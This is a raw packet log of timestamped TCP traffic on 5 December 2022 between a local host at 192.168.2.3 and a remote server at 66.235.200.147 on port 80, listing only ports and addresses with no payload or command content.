Dec 5, 2022 01:32:37.841578007 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.841586113 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.841595888 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.841607094 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.841629028 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.841643095 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.841649055 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.841664076 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.841670036 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.841682911 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.841691971 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.841696978 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.841716051 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.841732025 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.858637094 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.858669043 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.858742952 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.858757019 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.858774900 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.858817101 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.858817101 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.858817101 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.858849049 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.858869076 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.858900070 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.858918905 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.858917952 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.858937979 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.858937979 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.858958960 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.858969927 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.858978033 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.858983040 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.858999014 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.859008074 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.859019041 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.859021902 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.859038115 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.859050035 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.859057903 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.859064102 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.859076977 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.859080076 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.859097958 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.859098911 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.859118938 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.859137058 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.859141111 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.859155893 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.859164000 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.859175920 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.859189987 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.859194040 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.859203100 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.859213114 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.859215975 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.859232903 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.859237909 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.859251976 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.859258890 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.859272003 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.859272003 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.859289885 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.859298944 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.859308958 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.859316111 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.859328985 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.859344006 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.859349012 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.859355927 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.859369040 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.859375000 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.859389067 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.859390020 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.859407902 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.859412909 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.859427929 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.859436989 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.859447956 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.859450102 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.859467030 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.859473944 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.859487057 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.859491110 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.859507084 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.859508991 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.859525919 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.859529972 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.859545946 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.859549046 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.859565973 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.859569073 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.859585047 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.859591007 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.859605074 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.859607935 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.859628916 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.859633923 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.859648943 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.859657049 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.859668016 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.859672070 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.859683990 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.859688044 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.859708071 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.859710932 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.859723091 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.859726906 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.859745979 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.859750986 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.859765053 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.859767914 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.859783888 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.859783888 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.859803915 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.859810114 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.859822035 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.859823942 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.859843969 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.859847069 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.859863997 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.859863997 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.859878063 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.859884024 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.859903097 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.859906912 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.859920979 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.859921932 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.859935999 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.859941006 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.859961033 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.859963894 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.859976053 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.859981060 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.859998941 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.860001087 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.860017061 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.860023022 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.860042095 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.860044956 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.860060930 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.860066891 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.860079050 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.860083103 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.860099077 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.860104084 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.860119104 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.860125065 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.860142946 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.860145092 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.860163927 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.860165119 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.860183954 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.860186100 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.860203981 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.860207081 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.860228062 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.860233068 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.860248089 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.860253096 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.860265970 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.860275030 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.860291958 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.860292912 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.860312939 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.860312939 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.860326052 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.860332966 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.860352039 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.860352993 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.860371113 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.860377073 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.860388994 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.860390902 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.860410929 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.860411882 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.860423088 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.860430002 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.860449076 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.860451937 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.860467911 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.860472918 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.860486984 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.860486984 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.860507965 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.860510111 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.860527992 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.860529900 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.860542059 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.860547066 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.860567093 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.860567093 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.860585928 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.860590935 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.860600948 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.860605955 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.860625029 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.860630989 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.860644102 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.860646963 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.860661983 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.860663891 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.860683918 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.860686064 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.860697985 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.860703945 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.860723972 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.860726118 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.860742092 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.860742092 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.860761881 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.860764027 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.860778093 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.860781908 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.860801935 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.860805988 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.860821009 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.860824108 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.860840082 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.860845089 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.860857010 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.860860109 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.860877991 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.860881090 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.860897064 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.860901117 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.860920906 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.860920906 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.860940933 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.860944033 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.860960007 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.860965967 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.860979080 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.860984087 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.860996962 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.860999107 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.861018896 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.861022949 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.861038923 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.861040115 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.861058950 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.861063957 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.861078978 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.861083031 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.861098051 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.861103058 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.861116886 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.861119986 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.861135006 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.861136913 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.861155987 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.861165047 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.861176014 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.861180067 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.861196041 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.861198902 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.861215115 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.861222029 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.861233950 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.861236095 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.861254930 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.861259937 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.861274958 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.861277103 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.861294985 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.861299038 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.861314058 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.861315012 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.861330032 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.861334085 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.861352921 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.861355066 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.861371040 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.861373901 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.861393929 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.861394882 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.861407042 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.861413002 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.861432076 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.861433029 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.861450911 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.861454964 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.861468077 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.861473083 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.861490011 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.861493111 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.861512899 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.861519098 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.861531019 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.861532927 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.861547947 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.861551046 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.861567020 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.861571074 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.861589909 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.861608028 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.861625910 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.861630917 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.861645937 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.861665010 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.861665964 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.861684084 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.861687899 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.861702919 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.861711025 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.861723900 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.861723900 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.861736059 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.861745119 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.861762047 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.861763954 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.861783028 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.861783981 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.861803055 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.861804962 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.861816883 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.861823082 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.861841917 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.861843109 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.861861944 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.861865044 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.861877918 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.861881018 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.861900091 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.861915112 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.861915112 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.861918926 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.861938000 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.861951113 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.861957073 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.861972094 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.861978054 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.861989021 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.861998081 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.862010956 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.862016916 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.862026930 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.862037897 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.862040043 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.862056971 CET	80	49705	66.235.200.147	192.168.2.3
